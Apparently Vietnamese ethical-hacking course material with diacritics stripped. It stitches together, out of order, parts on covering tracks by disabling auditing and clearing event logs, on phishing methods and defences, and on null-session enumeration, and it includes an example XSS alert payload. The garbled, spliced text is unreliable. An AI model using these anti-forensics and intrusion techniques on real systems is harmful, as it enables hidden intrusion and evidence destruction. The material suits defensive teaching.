Chng li Steganography Steganography c th c pht hin bi mt s chng trnh, mc d lm nh vy l kh khn. Bcu tin trong vic pht hin l xc nh v tr cc tp tin vi cc vn bn n, c th c thc hin bng cch phn tch cc mu trong cc hnh nh v thay i bng mu.
Countermeasure Tools

Stegdetect l mt cng c t ng pht hin ni dung steganographic trong hnh nh. Dskprobe l mt cng c trn a CD ci t Windows 2000. N l qut a cng cp thp c th pht hin steganography.

Phn 5: Cover Your Tracks & Erase Evidence


Cover Your Tracks & Erase Evidence: Che du thng tin v xa b du vt Mt khi k xm nhp thnh cng, t c quyn truy cp qun tr vin trn mt h thng, c gng che du vt ca chng ngn chn b pht hin. Mt hacker cng c th c gng loi b cc bng chng hoc cc hot ng ca h trn h thng, ngn nga truy tm danh tnh hoc v tr ca c quan hacker. Xa bt k thng bo li hoc cc s kin an ninh c lu li, trnh pht hin. Trong cc phn sau y, chng ti s xem xt vic v hiu ha kim ton (auditing) v xa b cc bn ghi s kin (event log), l hai phng php c s dng bi hacker bao bc du vt v trnh b pht hin. Auditing l tnh nng ghi li Event Log. Windows Event Viewer l chng trnh dng qun l Auditing trn windows.

1. V hiu ha Auditing
Nhng vic lm u tin ca k xm nhp sau khi ginh c quyn qun tr l v hiu ha auditing. Auditing trong Windows ghi li tt c cc s kin nht nh Windows Event Viewer. S kin c th bao gm ng nhp vo h thng, mt ng dng, hoc mt s kin. Mt qun tr vin c th chn mc ghi nht k trn h thng. Hacker cn xc nh mc ghi nht k xem liu h cn lm g xa nhng du vt trn h thng.
Hacking tools

auditPol l mt cng c c trong b Win NT dnh cho cc qun tr ti nguyn h thng. Cng c ny c th v hiu ha hoc kch hot tnh nng kim ton t ca s dng lnh. N cng c th c s dng xc nh mc ghi nht k c thc hin bi mt qun tr vin h thng.

2. Xa Nht K X Kin
Nhng k xm nhp c th d dng xa b cc bn ghi bo mt trong Windows Event Viewer. Mt bn ghi s kin c cha mt hoc mt vi s kin l ng ng bi v n thng cho thy rng cc s kin khc b xa. Vn cn cn thit xa cc bn ghi s kin sau khi tt Auditing, bi v s dng cng c AuditPol th vn cn s kin ghi nhn vic tt tnh nng Auditing.
Hacking Tools

Mt s cng d xa cc bn ghi s kin, hoc mt hacker c th thc hin bng tay trong Windows Event Viewer. Tin ch elsave.exe l mt cng c n gin xa cc bn ghi s kin. Winzapper l mt cng c m mt k tn cng c th s dng xa cc bn ghi s kin, chn lc t cc ca s ng nhp bo mt trong nm 2000. Winzapper cng m bo rng khng c s kin bo mt s c lu li trong khi chng trnh ang chy. Evidence Eliminator l mt trnh xa d liu trn my tnh Windows. N ngn nga khng cho d liu tr thnh file n vnh vin trn h thng. N lm sch thng rc, b nh cache internet, h thng tp tin, th mc temp Evidence Eliminator cng c th c hacker s dng loi b cc bng chng t mt h thng sau khi tn cng.

Tng Kt
Hiu c tm quan trng ca bo mt mt khu. Thc hin thay i mt khu trong khong thi gian no , mt khu nh th no l mnh, v cc bin php bo mt khc l rt quan trng i vi an ninh mng. Bit cc loi tn cng mt khu khc nhau. Passive online bao gm sniffing, man-in-themiddle, v replay. Active online bao gm on mt khu t ng. Offline attacks bao gm dictionary, hybrid, v brute force. Nonelectronic bao gm surfing, keyboard sniffing, v social engineering. Bit lm th no c bng chng v activite hacking l loi b bi nhng k tn cng. Xo bn ghi s kin v v hiu ho phng php kim tra ca nhng k tn cng s dng che du vt ca chng. Nhn ra rng cc tp tin n l phng tin c s dng ly ra nhng thng tin nhy cm. Steganography, NTFS File, v cc lnh attrib l nhng cch tin tc c th n v n cp cc tp tin.

//////////////

CHNG 7: PHISING
Gi s mt ngy no bn m email ra v nhn c thng bo t ngn hng. Bn tng nhn email t ngn hng ny trc nhng email ny c v ng nghi ng, c bit l n yu cu bn tr li ngay lp tc nu khng ti khon ca bn s b ng. Bn s lm g?

Nhng thng bo nh th ny hoc tng t l nhng v d ca Phishing la o trc tuyn, mt phng php ca identity theft n cp d liu c nhn. Ngoi vic n trm thng tin c nhn v d liu v ti chnh, k chuyn la o trc tuyn (phisher) c th ly nhim my tnh vi virus v thuyt phc mi ngi tham gia mt cch v thc vo vic ra tin.

Hu ht mi ngi gp la o trc tuyn vi email la o hoc gi danh ngn hng, cng ty tn dng hoc cc doanh nghip nh Amazon v eBay. Nhng email ny trng rt ging tht v c gng thuyt phc mi nn nhn tit l thng tin c nhn. Tuy nhin, thng bo dng email ch l mt phn nh ca la o trc tuynTrong lnh vc an ton my tnh.

1. Phising l g?
Phising l mt hnh thc gian ln c nhng thng tin nhy cm nh username, password, credit card bng cch gi mo nh l mt thc th ng tin cy trong cc giao tip trn mng. Qu trnh giao tip thng din ra ti cc trang mng x hi ni ting, cc trang web u gi, mua bn hng onlinem a s ngi dng u khng cnh gic vi n. Phising s dng email hoc tin nhn tc thi, gi n ngi dng, yu cu h cung cp thng tin cn thit. Ngi dng v s ch quan ca mnh cung cp thng tin cho mt trang web,trng th c v hp php,nhng li l trang web gi mo do cc hacker lp nn. Phising l mt v d ca Social Engineering c s dng la o ngi dng v khai thc l hng trong vic s dng cng ngh km an ninh ca cc website hin hnh. Nhng n lc mnh m trong thi gian qua chng li Phising bao gm vic ng dng cc cng ngh an ninh mi n vic o to cho nhn vin, v nng cao thc cng ng. K thut la o c m t chi tit vo nm 1987, v nhng ghi chp u tin vi thut ng Phising Ngun gc t Phishing l kt hp gia 2 t Fish Fishing v Phreaking. Fishing ngha gc l cu c nhng uc hiu l cu cc thng tin ca ngui dng. Mt khc, do tnh cht ca n cng gn ging kiu tn cng Phreaking (Ch Ph duc cc hacker thay th cho ch F d to thnh phishing do cch pht m gn ging) uc bit n ln u tin bi hacker John Draper (bit danh aka Captain Crunch) khi s dng Blue Box tn cng h thng din thoi M nhm thc hin cc cuc gi ng di min ph hoc s dng ng in thoi ca ngui khc thc hin cc cuc gi bt hp php, vo u thp nin 1970 tn gi khc l Phone Phreaking. Theo thi gian, nhng cuc tn cng phishing khng cn ch nhm vo cc ti khon Internet ca AOL m m rng n nhiu mc tiu, c bit l cc ngn hng trc tuyn, cc dch v thuong mi din t, thanh ton trn mng, v hu ht cc ngn hng ln M, Anh, c hin du b tn cng bi phishing. V cng nhm vo mc tiu nh cp credit card nn n cn duc gi l Carding. Do cch tn cng n gin nhng li hiu qu cao nn phishing nhanh chng tr thnh mt trong nhng kiu la do ph bin nht trn mng c n gn 70% cc v tn cng trn mng nm 2003 c lin quan n phishing (ngun: Antiphishing.org).

2. Nhng Yu T Mt Cuc Tn Cng Phising Thnh Cng

Phising l mt trong nhng k thut ca Social Engineering, n cng ch yu da vo im yu ca con ngi. Chnh nhng bt cn, s ch quan ca ngi s dng gip k tn cng thnh cng hn. Vi yu t sau y s gip cuc tn cng Phising thnh cng tt p.

S thiu hiu bit


S thiu hiu bit v h thng mng v my tnh gip cho cc hacker khai thc nhng thng tin nhy cm. Bn cn hiu r qu trnh hot ng ca internet, hoc t hn hiu v cch thc truy cp mt website an ton. in hnh nht bn cn phi bit vic bm vo nt Save Password khi bn truy cp web ti cc im cng cng s lm tng nguy c b xm phm ti khon c nhn. c bit i vi nhng ngi thng xuyn mua bn, thanh ton qua mng, th cn phi hiu r vic cung cp credit card l rt quan trng, v bit c khi no nn cung cp, khi no khng. Bn cng nn tm hiu s v cc giao thc mng, v phn bit c giao thc no l an ton. in hnh l bn ng bao gi giao dch trc tuyn vi giao thc truy cp web l http, m phi m bo an ton vi giao thc https. Nhng ca s cnh bo ca windows v mc an ton ca vic truy cp thng tin, iu m mi ngi thng hay b qua, li chnh l nguy c bin bn thnh nn nhn. Thi quen duyt mail khng tt cng lm cho bn gp nhiu nguy him. C vi li khuyn cho bn, l cn thn vi nhng email khng c a ch ngi gi r rng, khng c tiu , hoc l ni dung c tnh kch ng tr t m.

nh la o gic
Ngh thut ca s nh la o gic chnh l lm cho nn nhn khng cn phn bit c u l tht u l gi. Chc hn bn cng bit tr chi tm nhng im khc nhau gia hai tm hnh. K thut nh la o gic s to ra mt trang web, hoc mt l thnhng th m ngy no bn cng truy cp, n ging nh dn mc gn nh ngi ta khng th pht hin ra s gi mo. Li khuyn dnh cho bn l cn thn vi nhng trang web m mnh thng truy cp, c bit l nhng email ca ngn hng, ca nhng ngi thn, m n li yu cu chng ta cung cp thng tin. Bi nhng trang c nguy c gi mo rt cao. Mt th hai, l bn hy t r a ch trang web vo trnh duyt, thay v click vo ng link t trang web khc. C ngha l bn hy t g vo trnh duyt a ch https://www.amazone.com thay v click vo mt lin kt trong email n chuyn bn n vi trang https://www.amazona.com c ni dung ging ht trang amazone.

Khng ch n nhng ch tiu an ton


Nh ni trn, nhng cnh bo thng b ngi dng b qua, chnh iu to iu kin cho hacker tn cng thnh cng hn. Ngi dng cng thng khng ch n nhng ch tiu an ton. V d khi bn truy cp mt website thanh ton trc tuyn, bn phi hiu nhng quy nh an ton ca website kiu ny, nh thng tin Cerificate, nh cung cp, ni

dung, v nhiu quy nh khc. Windows thng nhn bit nhng quy nh ton ny, v nu khng n s cnh bo cho bn. Tuy nhin, vi ngi dng cm thy phin phc vi nhng cnh bo ny v tt chc nng ny i, v th l bn tr thnh nn nhn. Thnh thong, chng ta cng nn dnh thi gian cho vic c tin tc v th gii hacker, bit c nhng th on la lc mi pht minh, t c thc v s cnh gic an ton hn.

3. Nhng Phng Thc Ca Phising


Email and Spam
K thut tn cng Phising ph bin nht l dng email. Hacker s tin hnh gi hnh lot cc th n nhng a ch email hp l. Bng nhng k thut v cng c khc nhau, hacker tin hnh thu thp a ch email trc. Vic thu thp a ch email hng lot khng hn l bt li nu bit s dng ng cch. in hnh l chin lc qung co cn rt nhiu n s tr gip ca hng loat a ch email ny. Tuy nhin hacker li dung vic ny gi nhng l th c ni dung trng c v hp l. Nhng ni dung ny thng c tnh khn cp, i hi ngi nhn th phi cung cp thng tin ngay lp tc. Hacker s dng giao thc SMTP km theo vi k thut gi mo trng Mail From khin cho ngi nhn khng c cht nghi ng no. V d, hacker s gi email c gi t ngn hng, v yu cu ngi dng cung cp thng tin c nhn m li ti khon do mt s c no . Ni dung email c gi thng s c vi ng link cho bn lin kt n mt trang web. Nh trnh by trn, nhng link ny nu khng cn thn s cho l link n mt trang web gi mo do hacker dng nn.

Web-based Delivery
Mt k thut tip theo ca Phising l da vo vic pht tn cc website la o. Bn thng thy cc website dng nh kim tin online. Chng yu cu bn cung cp cc thng tin ti khon ngn hng tin hnh tr tin cng. Bn khng ngn ngi g khi ang ch i s tin cng hu hnh. Kt cuc tin cng khng thy m tin trong ti khon cng khng cn. Mt hnh thc la o tinh vi hn cng lin quan n vic kim tin online. Theo cc chuyn gia nh gi c n 90% l khng th ly tin sau mt khon thi gian lm vic mit mi ca bn. Ci m nhng k la o thu c khng phi l tin ca bn, m chnh l cng sc c qung co ca bn, c tr bi cc cng ty qung co. Mt hnh thc khc l khiu khch s t m ca ngi dng. Bng cch chn vo trang web nhng banner hoc nhng text qung co c khiu khch s t m ca ngi dng. V d nh nhng hnh nh khiu dm, nhng ni dung ang nng. Kt qu sau khi click vo th my tnh ca bn c th b nhim mt loi malware no , phc v cho mt cng tn cng khc.

IRC and Instant Messaging


Chat l thut ng qu quen thuc vi mi ngi, hay cn gi l tr chuyn trc tuyn. N rt hu ch trong giao tip. Tuy nhin, nhng k la o bt u li dng vo vic chat chit ny tin hnh cc hnh ng la o. Bng nhng k thut tn cng, nhng k la o tin hnh gi tin nhn tc th n hng lot ngi dng. Nhng ni dung c gi thng c lin quan n hng lot ngi dng, v cng li dng vo tr t m ca mi ngi. V tnh khng nht qun ca vic tr chuyn online, nhng ngi tr chuyn online thng khng thy mt nhau nn khng th bit ngi ang ni chuyn vi mnh c tin cy hay khng. Mt k thut tinh vi ca kiu la o ny l gi dng nick chat. Bng cch gi mt nick chat ca ngi quen tin hnh tr chuyn v yu cu cung cp thng tin hoc la o lm mt vic g . Gn y Vit Nam n r tnh trang la o ny. Nhiu ngi dng chat vi bn b ngi thn ca mnh, v h c nh v vic np tin in thoi di ng. Nn nhn v thy nick ang chat l ca ngi quen nn khng cht ngn ngi no trong vic c nh v ny.

Trojaned Hosts
Nh ni phn trc, la o khng nhng ch nhm n nhng thng tin c nhn ca nn nhn, m cn nhiu hnh th khc. Mt kiu la o khc l la cho nn nhn ci vo my tnh ca mnh mt phn mm gin ip. Phn mm gin ip (tronjan, keylog) ny s phc v cho mt mc ch tn cng khc. in hnh ca cng vic ny l nn nhn b nhim tronjan v tr thnh mt my tnh con trong mt cuc tn cng tng th trn din rng.

4. Qu Trnh Phising
T u n cui ca mt v la o phising bao gm cc khu sau. 1. 1. Ln k hoch: Nhng k la o trc tuyn xc nh mc tiu doanh nghip no xng ng l nn nhn v xc nh cch ly a ch email khch hng ca doanh nghip . Chng thng s dng cch gi nhiu email v phng php thu thp a ch email nh nhng spammer. 2. 2. Thit lp: Sau khi xc nh c doanh nghip v nn nhn, phisher s tm cch pht tn email v thu thp d liu. Thng thng, chng s dng a ch email v mt trang web no . 3. 3. Tn cng: y l bc mi ngi u bit phisher s gi mt thng bo gi mo, nh n t mt ngun ng tin cy. 4. 4. Thu thp: Phisher s thu thp thng tin m nn nhn in vo cc trang Web hoc cc ca s pop-up. 5. 5. n cp d liu c nhn v la o: Phisher s dng thng tin m chng thu thp c thc hin mua bn bt hp php hoc thm ch l thc hin la o.

Nu nhng k la o trc tuyn mun sp xp mt cuc tn cng khc, hn s xc nh t l thnh cng v tht bi ca mt v la o thnh cng ri bt u li qu trnh.

5. Cc Kiu La o Ca Phising
Da vo nhng phng thc trn, nhng k la o bt u tin hnh qu trnh la o. Cn c theo cch thc hot ng, ngi ta phn loi nhng cuc tn cng la o ra thnh cc loi sau.

Man-in-the-Middle Attacks
k thut ny, my tnh ca attacker c xem nh l my tnh trung gian gia my tnh ca ngi dng v website tht. Attecker dng ln mt my tnh trung gian nhn d liu ca ngi dng v chuyn n cho website tht. Hoc nhn d liu ca website tht ri chuyn cho ngi dng. D liu khi chuyn qua li s c lu tr li ti my tnh ca attecker. Thot nghe m t ny chng ta ngh ngay n chc nng ca Proxy Server. ng vy, do proxy chnh l nhng ni khng tin cy cho lm khi chng ta truy cp web thng qua n. Nhng k tn cng s dng ln mt Proxy Server vi li mi gi s dng c tung ra internet. V l do g ( gi ip trong mua bn hng qua mng) ngi dng s tm n proxy server ny nh gip trong vic truy cp web. V th l v tnh ngi tr thnh con mi cho bn hacker. Nhng k tn cng ngoi vic dng ln proxy server ri d con mi n cn ngh n vic tn cng vo cc proxy server ny ly d liu. Bng nhng k thut tn cng no khc, hacker xm nhp h thng lu tr ca proxy ly d liu, phn tch v c c nhng th m h cn. Mt cch khc tn cng trong k thut ny, l tm cch lm lch ng i ca gi d liu. Thay v phi chuyn gi tin n cho web server, th ng ny l chuyn n my tnh ca hacker trc, ri sau my tnh ca hacker s thc hin cng vic chuyn gi tin i tip. lm iu ny, hacker c th s dng k thut DNS Cache Poisoning l k thut lm lch ng i ca gi d liu bng cch lm sai kt qu phn gii a ch ca DNS. Mt im cn lu rng, k thut tn cng ny khng phn bit giao thc web l HTTP hay HTTPS.

URL Obfuscation Attacks


Lm gi URL l k thut tip theo m chng ta s bn n. Trong k thut, attacker s lm gi URL ca mt trang web c nhiu ngi truy cp. Bng cch no , URL ny c gi n cho ngi dng, v thiu tnh cn thn nn ngi dng truy cp vo web ny. V d nh thay v truy cp http://www.amazone.com th li truy cp vo website http://www.amazione.com

K thut ca vic lm thay i mt cht xu v URL nh th c gi l dotless ip addresses, Mi ngi ngh rng vic ny n gin, tuy nhin n khng d cht no u. Bn c th tm hiu v k thut ny ti a ch http://morph3us.org/blog/index.php?/archives/35Dotless-IP-addresses-and-URL-Obfuscation.html

Cross-site Scripting Attacks


Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht hin nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi cc nh pht trin web v c nhng ngi s dng web. Bt k mt website no cho php ngi s dng ng thng tin m khng c s kim tra cht ch cc on m nguy him th u c th tim n cc li XSS. Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ) nhng th HTML hay nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong , nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML. K thut tn cng XSS nhanh chng tr thnh mt trong nhng li ph bin nht ca Web Applications v mi e do ca chng i vi ngi s dng ngy cng ln. V c bn XSS cng nh SQL Injection hay Source Injection, n cng l cc yu cu (request) c gi t cc my client ti server nhm chn vo cc thng tin vt qu tm kim sot ca server. N c th l mt request c gi t cc form d liu hoc cng c th ch l cc URL nh l http://www.example.com/search.cgi?query=<script>alert(XSS was found !);</script> V rt c th trnh duyt ca bn s hin ln mt thng bo XSS was found !. Cc on m trong th script khng h b gii hn bi chng hon ton c th thay th bng mt file ngun trn mt server khc thng qua thuc tnh src ca th script. Cng chnh v l m chng ta cha th lng ht c nguy him ca cc li XSS. Nhng nu nh cc k thut tn cng khc c th lm thay i c d liu ngun ca web server (m ngun, cu trc, c s d liu) th XSS ch gy tn hi i vi website pha client m nn nhn trc tip l nhng ngi khch duyt site . Tt nhin i khi cc hacker cng s dng k thut ny deface cc website nhng vn ch tn cng vo b mt ca website. Tht vy, XSS l nhng Client-Side Script, nhng on m ny s ch chy bi trnh duyt pha client do XSS khng lm nh hng n h thng website nm trn server. Mc tiu tn cng ca XSS khng ai khc chnh l nhng ngi s dng khc ca website, khi h v tnh vo cc trang c cha cc on m nguy him do cc hacker li h c th b chuyn ti cc website khc, t li homepage, hay nng hn l mt mt khu, mt cookie thm ch my tnh bn c th s b ci cc loi virus, backdoor, worm

Hidden Attacks

Attacker s dng cc ngn ng lp trnh HTML, DHTML, hoc ngn ng dng script khc chn vo trnh duyt ca ngi dng. Hoc s dng cc k t c bit nh la ngi dng. Nhng phng thc thng c attacker s dng l lm n cc frame. Cc Frame s c attacker lm n i trn trnh duyt ca ngi dng, qua attacker c th chn vo nhng on m c. Mt cch khc tn cng l ghi ni dung trang web hoc thay i hnh nh trn trang web. Qua nhng ni dung b thay i ny, attaker s chn nhng on m c hi vo .

6. Chng La o Trc Tuyn


Cc bc bn thng dng bo v my tnh ca bn nh s dng firewall v phn mm dit virus, cng c th gip bn trnh khi la o trc tuyn. Bn c th hin th chng ch s SSL ca trang Web v bn k in sn ca ngn hng hoc th tn dng c thm nhng bin php bo mt. Ngoi ra, phisher c xu hng li mt s du hiu trong email thng bo v a ch Web. Khi bn c email, hy ch ti: 1. Cc cu cho chung chung, nh Dear Customer. Nu ngn hng bn ang gi tin gi cho bn mt thng bo chnh thc, s c tn y ca bn trong (gn y mt s phisher chuyn sang kiu la mi spear phishing bao gm thng tin c nhn ca bn) 2. e da v ti khon ca bn v yu cu ngi dng phi c hnh ng ngay, v d nh hy tr li trong vng 5 ngy, nu khng chng ti s ng ti khon ca bn. 3. Yu cu thng tin c nhn. Hu ht cc doanh nghip khng yu cu bn cung cp thng tin c nhn thng qua in thoi hoc email trc khi la o trc tuyn tr nn ph bin. 4. Nhng ng link kh nghi. ng link di hn bnh thng, sai chnh t cng c th l du hiu ca la o trc tuyn. S an ton hn nu bn a ch ca trang Web trong trnh duyt, hn l kch vo bt k ng link no trong email. 5. Sai chnh t trm trng May mn thay, cc doanh nghip v chnh ph vn ang chin u vi nn la o trc tuyn. Cui nm 2006, chnh ph M hng dn cc ngn hng s dng cc phng php bo mt, bao gm c mt khu ln cc phng php nh th bi xc nhn, my qut vn tay, i vi giao dch trc tuyn. Rt nhiu nh cung cp dch v Internet (ISP) v lp trnh vin cung cp nhng thanh cng c phishing gip nhn dng bo mt, thng bo cho bn nhng a ch bn mun truy cp c ng k v x l. H cng cung cp nhng cng c thng bo hin tng phishing. Cc phn mm khc s dng cc du hiu nhn bit xc nhn bn truycp a ch hp php. i mt vi phishing

Nu nhn c mt email m bn tin l ca nhng k la o trc tuyn, bn khng nn: tr li li, kch vo ng link c trong email hoc in nhng thng tin c nhn. Thay vo , bn nn tm cch thng bo vi doanh nghip ang b chng gi mo. s dng trang Web hoc s in thoi ca h hn l i theo cc ng link trong email gi mo. Nu bn tin rng mnh gi thong tin c nhn cho mt phisher, bn nn gi thng bo ti:

Cng ty b gi mo Cc ngn hng, t chc tn dng h ng cc thng tin c nhn ca bn Thng bo ti tr s cng an gn nht

Ngoi ra, bn nn i mt khu ti trang m bn va mi b la. Nu s dng mt khu chung cho nhiu trang Web, bn cng nn i ht mt khu cho cc trang . Tool Chng Phising PhishTank SiteChecker: y l mt website min ph cho mi ngi c th kim tra, theo di v chia s d liu v phising. Bn truy cp vo a ch http://www.phishtank.com/ c th s dng trang web ny. SpoofGuard l mt phn b sung (plug-in) tng thch vi Internet Explorer. SpoofGuard t mt n cnh bo ti thanh cng c (toolbar) ca trnh duyt web, v chuyn mu t xanh sang vng hoc nu bn truy cp vo mt trang web phishing. Nu bn c gng cung cp thng tin, SpoofGuard s cu d liu v cnh bo bn. Mc cnh bo cao hay thp c th c iu chnh qua cc thng s.

7. Tng Kt
Phising l mt hnh thc gian ln, la o. Nhng th on la o ca n ngy cng tinh vi hn, kh lng hn. Kt thc chng ny bn c th tm gn kin thc ca mnh nh sau:

Nhng yu t mt cuc tn cng phising thnh cng. Ch yu l do yu t con ngi, x hi. Nhng phng thc hot ng ca phising c th k ra nh: Email, Spam, Chat, Web, Trojaned Cc kiu la o ph bin nh la o bng cch gi dn URL, gi website, gi nhng thng bo ca h iu hnh i mt vi phising c l l vn nan gii nht. Chng ta khng th dit n, ch c cch l sng chung vi n, nhng hy tht cnh gic.

//////////

CHNG 6: Enumeration

Enumeration (Lit k) l bc tip theo trong qu trnh tm kim thng tin ca t chc, xy ra sau khi scanning v l qu trnh tp hp v phn tch tn ngi dng, tn my,ti nguyn chia s v cc dch v. N cng ch ng truy vn hoc kt ni ti mc tiu c c nhng thng tin hp l hn.

1. Enumeration L G?
Enumeration (lit k) c th c nh ngha l qu trinh trch xut nhng thng tin c c trong phn scan ra thnh mt h thng c trt t. Nhng thng tin c trch xut bao gm nhng th c lin quan n mc tiu cn tn cng, nh tn ngi dng (user name), tn my tnh (host name), dch v (service), ti nguyn chia s (share). Nhng k thut lit k c iu khin t mi trng bn trong. Enumeration bao gm c cng on kt ni n h thng v trc tip rt trch ra cc thng tin. Mc ch ca k thut lit k l xc nh ti khon ngi dng v ti khon h thng c kh nng s dng vo vic hack mt mc tiu. Khng cn thit phi tm mt ti khon qun tr v chng ta c th tng ti khon ny ln n mc c c quyn nht cho php truy cp vo nhiu ti khon hn cp trc y. Cc k thut c s dng trong lit k c th k ra nh:

K thut Win2k Enumeration : dng trch xut thng tin ti khon ngi dng (user name). K thut SNMP (Simple Network Management Protocol) lit k thng tin ngi dng. K thut Active Directory Enumeration dng trong lit k h thng Active Directory. S dng Email IDs tm kim thng tin.

Tt c nhng k thut ny chng ta s ln lt i vo tho lun trong nhng phn sau.

2. Null Session
Null Session l g?
Khi ng nhp vo h iu hnh, qu trnh chng thc xy ra, n yu cu ngi dung cung cp username v password tin hnh chng thc. Sau qu trnh chng thc, mt danh sch truy cp ACL c ti v xc nh quyn hn ca user ng nhp. N mt cch khc, qu trnh to cho user mt phin lm vic r rng. Tuy nhin, c nhng dch trong h iu hnh c kch hot t chy, vi mt user n danh no , chng hn nh SYSTEM USER. Loi user ny khng cn c password, v n c dng khi chy cc dch v. N khng c dng ng nhp, nhng c dng s dng mt s dch v. Khi bn dng loi user ny ng nhp, bn b ri vo trng thi Null Session.

Null Session, hay c gi l IPC$ trn my ch nn tng Windows, l mt dng kt ni nc danh ti mt mng chia s cho php ngi dng trong mng truy cp t do.

Tn cng Null Session xut hin k t khi Windows 2000 c s dng rng ri. Tuy nhin, hnh thc tn cng ny khng c cc qun tr vin h thng ch khi p dng cc bin php bo mt mng. iu ny c th dn n kt cc khn lng v tin tc c th s dng hnh thc tn cng ny ly mi thng tin hu dng cn thit ginh quyn truy cp t xa vo h thng. Mc d khng cn mi m, nhng tn cng Null Session vn ph bin v nguy him nh nhng nm trc y. Xt v mt kha cnh no , mc d kh nng bo mt ca cc h thng hin i khng phi qu yu nhng khi thc hin cc cuc th nghim xm nhp trn my tnh Windows th kt qu cho thy Null Session vn l mt trong nhng hnh thc cn lu .

Phng thc hot ng ca Null Session


Mt phin truy cp t xa c to lp khi ngi dng ng nhp t xa vo mt my tnh s dng mt tn ngi dng v mt khu c quyn truy cp vo ti nguyn h thng. Tin trnh ng nhp ny c thc hin qua giao thc SMB (Server Message Block) v dch v Windows Server. Nhng kt ni ny hon ton hp php khi nhng thng tin ng nhp chnh xc c s dng. Mt Null Session xy ra khi ngi dng thc hin kt ni ti mt h thng Windows m khng s dng tn ngi dng hay mt khu. Hnh thc kt ni ny khng th thc hin trn bt k hnh thc chia s Windows thng thng no, tuy nhin li c th thc hin trn chia s qun tr IPC (Interprocess Communication). Chia s IPC c cc tin trnh ca Windows s dng (vi tn ngi dng l SYSTEM) giao tip vi cc tin trnh khc qua mng ny. Chia s IPC ch c giao thc SMB s dng. Chia s khng yu cu thng tin ng nhp IPC thng c s dng cho nhng chng trnh giao tip vi mt chng trnh khc, tuy nhin khng c g m bo rng ngi dng khng th kt ni ti mt my tnh bng kt ni IPC ny. Kt ni IPC khng ch cho php truy cp khng gii hn vo my tnh, m cn trao quyn truy cp vo tt c cc my tnh trn mng, v y l nhng g m tin tc cn xm nhp h thng.

Phng thc tn cng s dng Null Session


Gi y chng ta bit cch thc hot ng ca Null Session, tuy nhin liu tin tc c th s dng hnh thc tn cng ny d dng hay khng? Cu tr li l kh d dng. Kt ni Null Session c th c thit lp trc tip t mt lnh Windows m khng cn s dng cng c b sung, chnh l lnh NET. Lnh NET c th thc hin nhiu chc nng qun tr, khi s dng lnh ny chng ta c th to mt kt ni ti mt chia s tiu chun trn my ch ch, tuy nhin kt ni ny s tht bi do nhng thng tin ng nhp khng chnh xc.

Hnh 6. 2: Kt ni tht bi vo mt mng chia s s dng lnh NET. Khi s dng lnh NET, chng ta c th thay i tn chia s kt ni ti chia s qun tr IPC$. Khi kt qu s kh quan hn.

Hnh 6. 3: Kt ni Null Session thnh cng vi lnh NET. Lc ny, chng ta thit lp mt kt ni Null Session ti my tnh nn nhn. Tuy nhin, chng ta vn cha c quyn truy cp qun tr trn my tnh ny do cha th bt u duyt tm cng hay ly mt khu. Cn nh rng, chia s IPC c s dng giao tip gia cc tin trnh, do quyn truy cp ca chng ta s b gii hn xung quyn truy cp ca tn ngi dng SYSTEM. Chng ta c th s dng lnh NET ly nhiu thng tin hn t my tnh mc tiu, tuy nhin c nhiu cng c t ng ha s thc hin cc cng vic rc ri ny.
Hacking Tool

Null Session c th d dng tn cng vi cng c c sn trong windows nh Net, Netview. Tuy nhin, nh trnh by trn, chng ta cn mt qu trnh phc tp hn lm c nhiu vic, nh lit k th mc, userCng c Nbtstat v Enum s gip chng ta thc hin hng lot cc cng vic phc tp, cui cng chng ta xp nhp c vo h thng. Dumpsec v Superscan l hai cng c ha h tr thc hin cc cng vic ny.

Chng tn cng bng Null Session


Khi ngh n tin tc v cc cuc tn cng, c l cu hi u tin thng c ngh n l liu h thng ca chng ta c im yu hay khng? Cu tr li ph thuc vo h iu hnh trn mi trng mng. Nu ang s dng h iu hnh Windows XP, Windows Server 2003 hay Windows 2000, th mt mc no cu tr li l c. Hnh thc tn cng ny kh c th thc hin khi ngi dng s dng cc phin bn h iu hnh cao hn, tuy nhin Windows XP v Windows Server 2003 vn l nhng h iu hnh c a chung nht. C mt s phng php khc m chng ta c th thc hin chn Null Session. Chn Null Session trong Registry Kh nng tng thch ca nhng phn mm hp php cng vi thc t rng hu ht doanh nhip phi gn b vi cc h iu hnh c tht cht ngn sch l hai l do chnh khin my trm v my ch Windows 2000 vn tn ti. Nu vn s dng Windows 2000, chng ta ch cn thc hin mt thay i nh trong Registry l c th chn kh nng ly thng tin s dng Null Session. Khi truy cp vo Regedit v duyt tm ti key HKLM/System/CurrentControlSet/Control/LSA/RestrictAnonymous, chng ta c th cu hnh 3 ty chn bao gm:

0 Ci t mc nh. Truy cp Null Session khng gii hn. 1 Khng nhng loi b Null Session m cn chn hin th tn ngi dng v cc chia s. 2 Loi b mi gi tr ti Null Session bng cch chn mi truy cp.

Nh chng ta thy, Null Session khng th b loi b hon ton, tuy nhin, kh nng truy cp ca n s b gii hn nu la chn ty chn ci t l 2. Cn thn trng khi cu hnh ty chn ny trn my ch Windows 2000 v c th lm hng Clustering. rn Windows XP v Windows Server 2003, chng ta c th thc hin tc v tng t trong ba Registry Key: HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM HKLM\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous Kha cc port truy cp Nu khng th thc hin cc thay i trong cc Registry Key c nhc n trn, th chng ta c th chn mi truy cp vi Windows Firewall hay Network Firewall. Tin trnh ny c th c thc hin bng cch chn truy cp ti cc cng lin quan ti NetBIOS v SMB thng qua TCP/IP. Nhng cng ny bao gm:

Cng Cng Cng Cng Cng

TCP 135. UDP 137. UDP 138. UDP 139. TCP v UDP 445.

